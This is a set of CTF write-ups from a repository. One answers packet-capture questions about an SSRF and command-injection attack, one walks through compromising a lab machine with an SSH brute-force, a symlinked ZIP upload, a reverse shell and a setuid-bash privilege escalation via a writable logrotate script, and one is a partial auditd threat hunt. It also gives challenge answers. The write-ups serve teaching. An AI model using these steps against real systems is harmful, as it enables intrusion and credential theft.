--------------------------------------------------------------------------------
/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C4 - #exec cmd=whoami/images/figure-9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/README.md:
--------------------------------------------------------------------------------
1 | # Packet Detective
2 |
3 | In the .pcap file given to you, an attack path of a malicious user has been captured. Analyze it and answer the questions.
4 |
5 | **Question 1.** How many ICMP Echo requests were sent to the target initially?
6 |
7 | **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***)
8 |
9 | **Question 3.** Which port was open?
10 |
11 | **Question 4.** Which football club’s website was hosted on that port?
12 |
13 | **Question 5.** Which port did the attacker host an HTTP server?
14 |
15 | **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)
16 |
17 | **Question 7.** Which port hosted an internal application?
18 |
19 | **Question 8.** What is the name of the file containing sensitive information?
20 |
21 | **Question 9**. What is the password?
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/Writeup.md:
--------------------------------------------------------------------------------
1 | # Solution
2 |
3 | - **Question 1.** How many ICMP Echo requests were sent to the target initially?
4 | - Filter: **`icmp && ip.src == 192.168.149.131`**
5 |
6 | 
7 |
8 | - ANSWER: **`10`**
9 |
10 | ---
11 |
12 | - **Question 2.** Which ports were scanned by the attacker? (Answer format: **port1,port2**, etc. ***in the ascending order***)
13 | - Packets number from **27** to **37** is an indicator of a port scan.
14 |
15 | 
16 |
17 | - According to the packets with SYN flag sent by source IP address, 192.168.149.131, we can determine which ports were scanned.
18 |
19 | - ANSWER: **`22,80,4000,5000,8080`**
20 |
21 | ---
22 |
23 | - **Question 3.** Which port was open?
24 | - As seen from the port scan capture, port **`4000`** responded with a packet of **`[SYN,ACK]`** flag. The attacker host then sent a TCP packet with a **`RST`** flag and terminates the connection, because it determined that it was open.
25 |
26 | - ANSWER: **`4000`**
27 |
28 | ---
29 |
30 | - **Question 4.** Which football club’s website was hosted on that port?
31 | - Following HTTP stream from packet number 61 is enough to determine:
32 |
33 | 
34 |
35 | - ANSWER: **`Qarabagh`**
36 |
37 | ---
38 |
39 | - **Question 5.** Which port did the attacker host an HTTP server?
40 | - The packet number 105 shows us the request made to the attacker’s HTTP server, which was hosted on port 8888.
41 |
42 | 
43 |
44 | - ANSWER: **`8888`**
45 |
46 | ---
47 |
48 | - **Question 6.** Which attack did the attacker try to conduct? (***Full name, please.***)
49 | - The attacker tried to fetch unauthorized resources by making the requests on behalf of the server, meaning that they tried to conduct a **Server-Side Request Forgery** attack.
50 |
51 | - ANSWER: **`Server-Side Request Forgery`**
52 |
53 | ---
54 |
55 | - **Question 7.** Which port hosted an internal application?
56 | - The request made to the port **4455** of the localhost was successful:
57 |
58 | 
59 |
60 | - ANSWER: **`4455`**
61 |
62 | ---
63 |
64 | - **Question 8.** What is the name of the file containing sensitive information?
65 | - The attacker made a request by exploiting a command injection vulnerability in the internal application to read the contents of the file called **`github-pass`**:
66 |
67 | 
68 |
69 | - ANSWER: **`github-pass`**
70 |
71 | ---
72 |
73 | - **Question 9**. What is the password?
74 | - Following the HTTP stream for packet number 2051:
75 |
76 | 
77 |
78 | - ANSWER: **`Mar0j3vic_2024!$`**
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/challenge.pcapng
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C5 - Packet Detective/images/figure-7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/README.md:
--------------------------------------------------------------------------------
1 |
2 | # Exorcising Sukuna’s Curse
3 |
4 | *The network has been cursed by Sukuna’s influence. As a jujutsu sorcerer, you must help Yuta track down the cursed flags hidden within the system, each like one of Sukuna’s fingers. Uncover the full extent of the breach and aid Yuta in defeating the King of Curses before the network falls. Can you exorcise Sukuna’s curse in time?*
5 |
6 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/Writeup.md:
--------------------------------------------------------------------------------
1 |
2 | ### **Exorcising Sukuna’s Curse**
3 |
4 | 
5 |
6 | ---
7 |
8 | ## CONNECTION
9 |
10 | Let’s start the machine and connect with OpenVPN.
11 |
12 | ```bash
13 | sudo openvpn prolab-user_1.ovpn
14 | ```
15 |
16 | 
17 |
18 |
19 | ---
20 |
21 | ## ENUMERATION
22 |
23 | - NMAP SCAN
24 |
25 | ```bash
26 | nmap -sC -sV -p- --min-rate 5000 10.20.17.70
27 | ```
28 |
29 | 
30 |
31 | An initial Nmap scan reveals two open ports. On port 21 `FTP`, and on port 22 `SSH` service is running. The Nmap script result indicates that Anonymous login for FTP is allowed. Now, we can continue enumeration process with FTP.
32 |
33 | - FTP LOGIN
34 |
35 | ```bash
36 | ftp 10.20.17.70
37 | ```
38 |
39 | 
40 |
41 | Only one .txt file exists on FTP server (system_log.txt). In order to read it, firstly, we exchange to `binary` mode and download the file to our machine with `get` command.
42 |
43 | ```bash
44 | ftp> binary
45 | ftp> get system_log.txt
46 | ftp> exit
47 | ```
48 |
49 | 
50 |
51 | We’ve received a hint from the file: the probable username is 'user1', and the SSH service, since it’s open, will be a target for a potential brute-force attack. We can move on to the next stage.
52 |
53 | ---
54 |
55 | ## EXPLOITATION & INITIAL FOOTHOLD
56 |
57 | - SSH BRUTE-FORCE
58 |
59 | ```bash
60 | hydra -l user1 -P rockyou.txt 10.20.17.70 ssh
61 | ```
62 |
63 | 
64 |
65 | Soon, we successfully cracked the user's password and gained an initial foothold on the machine using SSH credentials.
66 |
67 | 
68 |
69 | ---
70 |
71 | ## PRIVILEGE ESCALATION ( HORIZONTAL )
72 |
73 | The first flag we should get is located on `/home/user2/user.txt.`
74 |
75 | That is a user on the machine to which we need to escalate our privileges.
76 |
77 | ```bash
78 | cat /etc/passwd
79 | ```
80 |
81 | 
82 |
83 | Besides user2, the presence of another user `www-data` shows that a web application is likely running on the machine.
84 |
85 | We will view running processes in order to determine the listening port for web server and /var/www/html folder to know the exact location for web application.
86 |
87 | ```bash
88 | netstat -tulpn
89 | ```
90 |
91 | 
92 |
93 | We don’t have permission for webapp folder. Port 9090 is commonly used as an alternative HTTP port for web servers. It is running on local machine: `127.0.0.1:9090`. That’s why we can’t access it from our machine. To achieve this, we need to set up port forwarding.
94 |
95 | ```bash
96 | ssh -L 127.0.0.1:4444:127.0.0.1:9090 user1@10.20.17.70
97 | ```
98 |
99 | 
100 |
101 | Explaining the commands:
102 |
103 | - `ssh -L` - used in local ssh port forwarding.
104 | - `127.0.0.1:4444` - is our local machine ip and port (port is optional).
105 | - `127.0.0.1:9090` - is remote machine ip and port in which web server is running.
106 | - `user1@10.20.17.70` - needed ssh credentials to connect.
107 |
108 | Once the set up is complete, we can open a web browser and access the web server at `http://127.0.0.1:4444` .
109 |
110 | 
111 |
112 | It appears that the Apache web server is running on the machine, with directory listing enabled. Let’s take a closer look at the script files.
113 |
114 | 
115 |
116 | `/uploads`
117 |
118 | Directory is empty.
119 |
120 | 
121 |
122 | `upload.php`
123 |
124 | Another hint suggests that we should look into the source code of upload.php. However, it currently does not reveal any useful information.
125 |
126 | 
127 |
128 | 
129 |
130 | `doc.php`
131 |
132 | This php script is intended to upload files to the remote machine. Let’s take advantage of it.
133 |
134 | We aim to understand the functionality of the script, that is why we upload a random file and observe that it only accepts ZIP files.
135 |
136 | 
137 |
138 | 
139 |
140 | There are many ways to exploit vulnerabilities with ZIP files, but our goal is to examine `upload.php`. Therefore, we will use a symlink to access the contents of the file.
141 |
142 | - Create and store symlinks in ZIP files:
143 |
144 | ```bash
145 | ln -s /var/www/html/webapp/upload.php zipfile #Make symlink to the exact location of upload.php.
146 | zip -y zipfile.zip zipfile #Create symlinked ZIP file.
147 | ```
148 |
149 | 
150 |
151 | 
152 |
153 | 
154 |
155 | 
156 |
157 | A folder is created for ZIP file and uploaded to the `/uploads` directory.
158 |
159 | 
160 |
161 | 
162 |
163 | The symlink was extracted from the ZIP file, and upon clicking it, we can now view the source code of `upload.php`
164 |
165 | 
166 |
167 | The script contains a message directing us to access the `/.pro_hidden_connectivity` folder.
168 |
169 | 
170 |
171 | 
172 |
173 | Here is another php script, named `rce.php` is for the Remote Code Execution.
174 |
175 | 
176 |
177 | 
178 |
179 | Before we proceed, we should initiate a netcat listener.
180 |
181 | 
182 |
183 | We have entered a suitable one-liner command for a reverse shell.
184 |
185 | 
186 |
187 | 
188 |
189 | It results in an error during code execution.
190 | The reason for this is clearly indicated in the script: `window.btoa`, which is used to encode a string in Base64 format.
191 |
192 | 
193 |
194 | Let’s encode the command to base64 format and execute it again. As a result, we have got a reverse shell from user2 and received our first flag.
195 |
196 | 
197 |
198 | 
199 |
200 |
201 |
202 | 
203 |
204 | ---
205 |
206 | # PRIVILEGE ESCALATION (ROOT)
207 |
208 | After having the shell from “user2”, now run the `linpeas.sh` for finding potential privilege escalation.
209 |
210 | Then we found logrotate in `/etc/cron.d`:
211 |
212 | 
213 |
214 | Additionally, there is a writable path for escalation that `linpeas.sh` shows.
215 |
216 | 
217 |
218 | When we look at the logrotate configuration files, we found an interesting configuration file called as “blackmirror”.
219 |
220 | 
221 |
222 | After reading this configuration file, we realized the file path is vulnerable :
223 |
224 | ```bash
225 | /usr/local/bin/postrotate.sh
226 | ```
227 |
228 | 
229 |
230 | Since `postrotate.sh` is writable by all users (due to `777` permissions), we modify it to include a command that will allow privilege escalation. Here’s how:
231 |
232 | - Overwrite `postrotate.sh` with a payload that creates a setuid shell:
233 |
234 | Explanation of malicious script:
235 |
236 | - `#!/bin/bash`: Specifies that the script should run with Bash.
237 | - `cp /bin/bash /tmp/bash`: Copies the system’s `bash` executable to `/tmp`.
238 | - `chmod +s /tmp/bash`: Sets the setuid permission, allowing the shell to execute with the privileges of the file owner (root).
239 |
240 | Now we are root!!!
241 |
242 | 
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/ctf2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 01.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 02.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 03.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 04.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 05.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 10.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 11.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 12.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/README.md:
--------------------------------------------------------------------------------
1 | **C7 - Root Reaper Quest**
2 |
3 | *Shinigami-like powers have been used to elevate privileges, leaving traces in the logs with cryptic references to Bleach. Your goal: identify the binary and PID responsible for gaining root. Will you find the key hidden in the shadows? (Write only PID)*
4 |
5 | 
6 |
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png
--------------------------------------------------------------------------------
/Who Am I/Writeups/C7 - Root Reaper Quest/writeup.md:
--------------------------------------------------------------------------------
1 | # C7 - Root Reaper Quest
2 |
3 | In this challenge, we are given a log file and tasked with performing a threat-hunting process. To work with this file, we can use tools like Notepad or Visual Studio Code or auditd. You can install it using the command below:
4 |
5 | `sudo apt install auditd`
6 |
7 | Once installed, we can start examining the file. A good starting point is using the `--summary` option to get an overall understanding of the file:
8 |
9 | 
10 |
11 | From the output, we can see that the account "bankai" was compromised. Our goal is to identify the type of attack that was used to gain initial access. Analyzing the results of the previous command, we notice that within a span of 1 second, there were almost 16 authentication attempts. This is a clear indication of a brute-force attack. The attacker got lucky, as we can see a successful attempt in the output.
12 | Seventeen seconds later, they used the compromised username and password to log in and successfully gained a pseudo-terminal.
13 |
14 | 
15 |
16 | Next, we need to analyze the attacker’s actions after gaining access. The first thing that likely comes to mind is that the attacker performed system enumeration. To investigate this, we can use the `--tty` parameter to generate a report on the tty keystrokes.
17 | As shown in the screenshot below, the attacker ran several commands:
18 | - `hostname` to retrieve the DNS name and set the system’s hostname or NIS domain name
19 | - `whoami` to display the username of the current user, and ls to list the contents of the current directory.
20 | - `wget` to download the linepeas script from their own machine, which was hosted on port 8000.
21 | (*LinPEAS is a script that search for possible paths to escalate privileges on*)
22 |
23 | 
24 |
25 | Now we need to determine the name of the binary that the attacker used to gain root access. This will give us the crucial piece of information required to finish this challenge: the PID responsible for it.
26 |
27 | Following the output from the previous command, we saw that the attacker executed the `lsb_release -a` command, which provides information about the Linux Standard Base (LSB) and distribution-specific details. After that, the attacker ran the `sudo -V` command, which prints the sudo version string, along with the version string of the security policy plugin and any I/O plugins. If the user invoking this command is already root, it will display the arguments passed to configure when sudo was built, and plugins may show more verbose information such as default options.
28 |
29 | Five seconds after determining the sudo version, the attacker downloaded a compressed file to the target machine, which was still hosted on their own server. They ran the `ls` command to confirm the successful download, extracted the contents, navigated to the extracted directory, and ran the `make` command to build it.
30 |
